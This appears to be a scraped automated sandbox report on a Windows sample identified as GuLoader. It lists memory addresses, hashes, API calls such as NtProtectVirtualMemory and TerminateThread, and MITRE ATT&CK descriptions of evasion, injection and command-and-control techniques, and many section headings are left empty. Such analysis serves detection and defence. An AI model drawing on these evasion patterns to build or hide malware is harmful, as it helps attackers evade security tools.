0x00401b4c
0x00401b4d
0x00401b4d
0x00401b26
0x00401b26
0x00401b2b
0x00401b2c
0x00401b2d
0x00401b2e
0x00401b2f
0x00401b30
0x00401b30
0x00401b32
0x00401b34
0x00401b35
0x00401b37
0x00401b37
0x00401b50
0x00401b50
0x00401bd1
0x00401bd1
0x00401bd2
0x00401bd2
0x00401bd4
0x00401bdb
0x00401bdb
0x00401bdc
0x00401bdc
0x00401bde
0x00401be0
0x00401be1
0x00401be5
0x00401be7
0x00401bec
0x00401bed
0x00401bee
0x00401bef
0x00401bf2
0x00401bf4
0x00401bf5
0x00401bf6
0x00000000
0x00401bf6
0x00401b52
0x00401b52
0x00401b53
0x00401b53
0x00000000
0x00000000
0x00401b54
0x00401b54
0x00401b55
0x00401b5b
0x00401b5c
0x00401b5d
0x00401b5e
0x00401b5f
0x00401b62
0x00401b64
0x00401b65
0x00401b66
0x00401b69
0x00000000
0x00401b69
0x00401b22
0x00401af2
0x00401af0
0x00401aee
0x00401aeb
0x00401b89
0x00401b89
0x00401b8b
0x00401b8c
0x00401b8d
0x00401b8e
0x00401b8f
0x00401b90
0x00401b92
0x00401b94
0x00401b95
0x00401b96
0x00401b97
0x00401b98
0x00401b98
0x00000000
0x00401a96
0x00401b06
0x00401b06
0x00000000

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4669046f0acb8ce6cab0f471fba06bce818e793e1f435ecedf7697c49e4b61dc
Instruction ID: d61846ff54463e24e37a54d55ea69811b0bd50a73b9e1972fcaa09d854266b6b
Opcode Fuzzy Hash: 4669046f0acb8ce6cab0f471fba06bce818e793e1f435ecedf7697c49e4b61dc
Instruction Fuzzy Hash: F6F0392880E3C19FC3238B704C626803F765D93554B4960CFC4C18F173EA29591CC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 020F5461, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 020F735B, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: LzbZ4T1iV8.exe PID: 1504 Parent PID: 7032 LzbZ4T1iV8.exeCOMMON

Executed Functions

Function 00569B42, Relevance: 3.1, APIs: 2, Instructions: 58nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(?), ref: 00569B69
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569BBD

Memory Dump Source

Source File: 0000000D.00000002.1716752946.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: 5c2e7198290b21ae1d4ec8f30927004641391be3944ca506d1c817d3f2dbcdc8
Instruction ID: 5e9e4430663e57181e7c53f650603e19750a5452427086e069157783a7daa1aa
Opcode Fuzzy Hash: 5c2e7198290b21ae1d4ec8f30927004641391be3944ca506d1c817d3f2dbcdc8
Instruction Fuzzy Hash: C31129B65083114FC714DF34DEC9F5A3E99FB1A3A4B2586D5E946CB272C335C881CA15

Uniqueness

Uniqueness Score: -1.00%

Function 00569B3D, Relevance: 3.1, APIs: 2, Instructions: 51nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(?), ref: 00569B69
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569BBD

Memory Dump Source

Source File: 0000000D.00000002.1716752946.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: 79d3adf15d80c4c4f2d1dc4c40b53e79c7c4b9998d2120095db0f456b2e7af4f
Instruction ID: ac5f2e9c2cb72d51919ab728d1e0171648593009fb294b37a1f2f908177f42f6
Opcode Fuzzy Hash: 79d3adf15d80c4c4f2d1dc4c40b53e79c7c4b9998d2120095db0f456b2e7af4f
Instruction Fuzzy Hash: 3C0122B15083119FD714AF34DECAE593E69FB193A4F224395E946CB2B2C331C881C616

Uniqueness

Uniqueness Score: -1.00%

Function 00569C0E, Relevance: 3.0, APIs: 2, Instructions: 34sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 00569C30
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00569C6E

Memory Dump Source

Source File: 0000000D.00000002.1716752946.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: bde809728943021b7ef44399486d9278e6ecfbf34b26bba9d8ccb97cbc6d81c9
Instruction ID: 92c60b903d2ce9a0df786ddd1d5719f7600471a7d11bc74d94e936a12e1deed3
Opcode Fuzzy Hash: bde809728943021b7ef44399486d9278e6ecfbf34b26bba9d8ccb97cbc6d81c9
Instruction Fuzzy Hash: 330169B0445340AFE7449F24C84EB69BBA8FF04365F268188E9654B1F6C3B8CD80CF21

Uniqueness

Uniqueness Score: -1.00%

Function 00569A4A, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(0D71FCCD,-5A3E81BF), ref: 00569AC4

Memory Dump Source

Source File: 0000000D.00000002.1716752946.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 64f63721300a915bd1fe9f2932c9c6ddb1afda8eac6be302208cd0be651e20af
Instruction ID: 5b7e6622975c9263606e652c3bdde99f4563639b3e2ad275f280ac640de916af
Opcode Fuzzy Hash: 64f63721300a915bd1fe9f2932c9c6ddb1afda8eac6be302208cd0be651e20af
Instruction Fuzzy Hash: BCF09A72A08288DBDB318F399C907CA37F9AF88710F85102AD80CDB241D3318A0A8B15

Uniqueness

Uniqueness Score: -1.00%

Function 00569C09, Relevance: 1.3, APIs: 1, Instructions: 15sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 00569C30
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 00569C6E

Memory Dump Source

Source File: 0000000D.00000002.1716752946.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 2548a95ba7c95509dab54109e22c79b0d7ff66d6a9f7fb45c38b52a8a02e4af4
Instruction ID: a6b7301f4133c1551f27270be47ab4ab1dac2fac54d6932950c2b40c0dbff4fe
Opcode Fuzzy Hash: 2548a95ba7c95509dab54109e22c79b0d7ff66d6a9f7fb45c38b52a8a02e4af4
Instruction Fuzzy Hash: 67D0E2701883419FE744AF60858DB14BBA9BB48321F468488EA090F0A3C7718C80CB21

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 00401144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Function 00404478, Relevance: .2, Instructions: 215
COMMONCrypto